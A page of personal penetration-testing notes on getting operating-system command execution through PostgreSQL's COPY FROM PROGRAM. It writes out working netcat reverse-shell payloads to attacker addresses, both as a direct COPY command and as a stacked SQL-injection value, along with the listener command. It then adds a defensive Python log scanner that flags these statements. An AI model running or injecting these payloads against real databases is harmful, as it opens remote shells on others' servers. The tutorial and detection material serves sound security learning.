πŸ‘¨β€πŸ’»
Jawad's Notes
  • πŸ‘¨β€πŸ«INFOSEC
    • πŸ•ΈοΈWeb
      • Burp Suite: Setting Foxyproxy
      • XSS
      • Wappalyzer
      • Directory Traversal
      • LFI
        • PHP Wrappers
        • RFI
      • Reverse Shell
        • Command Injection Quick Tips
      • File Upload
      • WPScan
      • SQL Injection
        • Schemas
        • SQLmap
        • MSSQL
        • MySQL
        • PostgreSQL
    • πŸ”§Tools
      • Whois
      • DNSRecon
      • DNSenum
      • nslookup
      • Netcat
        • Powercat
      • Nmap
        • Nmap Scripting Engine
        • Test-NetConnection
        • Grep
      • Server Message Block (SMB)
      • SNMP
      • SMTP
      • ExifTool
      • Search Engine Hacking
      • Source Control Hacking
      • Nessus
      • Canarytokens
      • Qualys SSL Server Test
      • Security Headers
      • theHarvester
      • Shodan
      • Gobuster
        • Dirb
      • Searchsploit
      • Password Cracking
        • Hashcat
        • John The Ripper
        • Hydra
        • hashID
        • CPU vs GPU
    • 🐧Linux
      • Symbols
      • cat
      • curl
      • openvpn
      • tcpdump
      • Remote Desktop
      • SmbShare
      • Tmux
      • Convert Windows-style line endings (CRLF) to Unix-style (LF)
      • SSH
    • πŸ–₯️Macros in Office
    • 🍎Enhancing Your MacOS Terminal Experience
    • 🚩CTF
      • SQL Injection
        • WHERE clause allowing retrieval of hidden data
        • Allowing login bypass
        • UNION attack, determining the number of columns returned by the query
        • UNION attack, finding a column containing text
        • UNION attack, retrieving data from other tables
        • UNION attack, retrieving multiple values in a single column
        • Querying the database type and version on Oracle
Powered by GitBook
On this page
  1. INFOSEC
  2. Web
  3. SQL Injection

PostgreSQL

To execute system commands on Linux or Windows using PostgreSQL, you can leverage the PROGRAM parameter in conjunction with the COPY command. Here's a step-by-step explanation of how to set up and use this method:

Command Execution Overview

The process starts with the creation of a table designed to store the output of the commands you execute. This can be a temporary or permanent table based on your requirements. Here, we'll create a permanent table called shell.

Step 1: Create a Table to Capture Output

First, create a table where the output of the executed commands will be stored. This table will have a single column to hold text data.

CREATE TABLE shell(output text);

Step 2: Using the PROGRAM Parameter to Execute Commands

With the table ready, you can now use the PROGRAM parameter within the COPY command to execute system-level commands. This example demonstrates how to set up a reverse shell, which allows you to execute commands remotely on the server where the PostgreSQL database is running.

COPY shell FROM PROGRAM 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 1234 > /tmp/f';

Here's a breakdown of the command sequence:

  • rm /tmp/f;: Removes any existing file named /tmp/f.

  • mkfifo /tmp/f;: Creates a named pipe /tmp/f. Named pipes allow for temporary file-like communication between processes.

  • cat /tmp/f | /bin/sh -i 2>&1: This part is the shell side. cat reads whatever arrives in the named pipe and feeds it to an interactive shell (/bin/sh -i); 2>&1 merges the shell's stderr into its stdout so both travel down the pipeline to netcat.

  • nc 10.0.0.1 1234 > /tmp/f: This uses netcat (nc) to connect back to the attacker's machine listening on IP 10.0.0.1 and port 1234. The shell's output is sent over that connection, and whatever netcat receives from the listener is written into /tmp/f, where cat picks it up and hands it to the shell, closing the loop into a continuous shell session.

Step 3: Set Up a Listener on the Attacking Machine

Before running the COPY command, ensure that you've set up a listener on the attacking machine to accept the incoming connection from the reverse shell:

nc -lvp 1234

This command tells netcat to listen (-l) on port 1234 (-p) and to report connection details verbosely (-v).

Security Considerations

Executing system commands via SQL in a database is a significant security risk and typically indicates that your system is already compromised or misconfigured to allow such actions. COPY FROM PROGRAM (and its counterpart COPY TO PROGRAM) runs the command as the database server's OS user and is only available to superusers and, since PostgreSQL 11, to members of the pg_execute_server_program role, so the account an application connects with should hold neither. Always ensure that database permissions are strictly managed and that using features like COPY FROM PROGRAM is disabled unless absolutely necessary and safeguarded by robust security measures.

Example (the same steps stacked into a single injected value for a vulnerable id parameter):

id=';DROP TABLE IF EXISTS commandexec; CREATE TABLE commandexec(data text);COPY commandexec FROM PROGRAM '/usr/bin/nc.traditional -e /bin/sh 192.168.1.2 4444';--
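Added here as a defender's companion to the two forms above (the direct COPY in Step 2 and the stacked injection in the example); it is not from the original notes or the linked article. It scans PostgreSQL statement logs for COPY ... FROM/TO PROGRAM and flags statements that stack several SQL commands into one request; the log lines are constructed, and the prefix format assumes log_line_prefix = '%m [%p] %u@%d ' with log_statement = 'all'.

```python
import re
# Constructed sample lines in PostgreSQL's stderr log format with
# log_line_prefix = '%m [%p] %u@%d ' and log_statement = 'all'; not real captures.
SAMPLE_LOG = """\
2024-05-01 10:00:01.123 UTC [4321] webapp@shop LOG:  statement: SELECT id, name FROM products WHERE id = 3
2024-05-01 10:00:02.456 UTC [4321] webapp@shop LOG:  statement: CREATE TABLE shell(output text);
2024-05-01 10:00:02.789 UTC [4321] webapp@shop LOG:  statement: COPY shell FROM PROGRAM 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 1234 > /tmp/f';
2024-05-01 10:00:03.000 UTC [4322] webapp@shop LOG:  statement: SELECT id FROM products WHERE id = '';DROP TABLE IF EXISTS commandexec; CREATE TABLE commandexec(data text);COPY commandexec FROM PROGRAM '/usr/bin/nc.traditional -e /bin/sh 192.168.1.2 4444';--'
2024-05-01 10:00:04.000 UTC [4323] etl@shop LOG:  statement: copy staging from '/var/lib/postgresql/import.csv' csv
2024-05-01 10:00:05.000 UTC [4324] etl@shop LOG:  statement: COPY   staging   FROM   program   'gzip -dc /srv/dump.gz'
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>[^@\s]+)@(?P<db>\S+) "
    r"LOG:\s+statement: (?P<stmt>.*)$"
)
# Both directions run the command as the server's OS user: FROM PROGRAM reads
# the command's output into a table, TO PROGRAM pipes query output into it.
PROGRAM_RE = re.compile(
    r"\bCOPY\b.*?\b(?P<dir>FROM|TO)\s+PROGRAM\s+'(?P<cmd>(?:[^']|'')*)'",
    re.I | re.S,
)
STRING_RE = re.compile(r"'(?:[^']|'')*'")  # SQL string literal; '' escapes a quote

def find_program_copies(log_text):
    """Return one finding per logged statement that invokes COPY ... PROGRAM."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # continuation, DETAIL or other non-statement line
        stmt = m.group("stmt")
        p = PROGRAM_RE.search(stmt)
        if not p:
            continue
        # Blank string literals first so semicolons inside the shell command
        # are not counted as stacked SQL statements (a sign of injection).
        blanked = STRING_RE.sub("''", stmt)
        stacked = len([s for s in blanked.split(";") if s.strip()]) > 1
        findings.append({
            "ts": m.group("ts"), "user": m.group("user"), "db": m.group("db"),
            "direction": p.group("dir").upper(),
            "command": p.group("cmd").replace("''", "'"),
            "stacked": stacked,
        })
    return findings

if __name__ == "__main__":
    for f in find_program_copies(SAMPLE_LOG):
        print(f["ts"], f["user"], f["direction"], f["stacked"], repr(f["command"]))
```

On the sample, the two webapp entries are the findings to act on; the etl one is a legitimate-looking import that still deserves a look at who holds pg_execute_server_program.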

Resource(s):

https://medium.com/r3d-buck3t/command-execution-with-postgresql-copy-command-a79aef9c2767

Last updated 1 year ago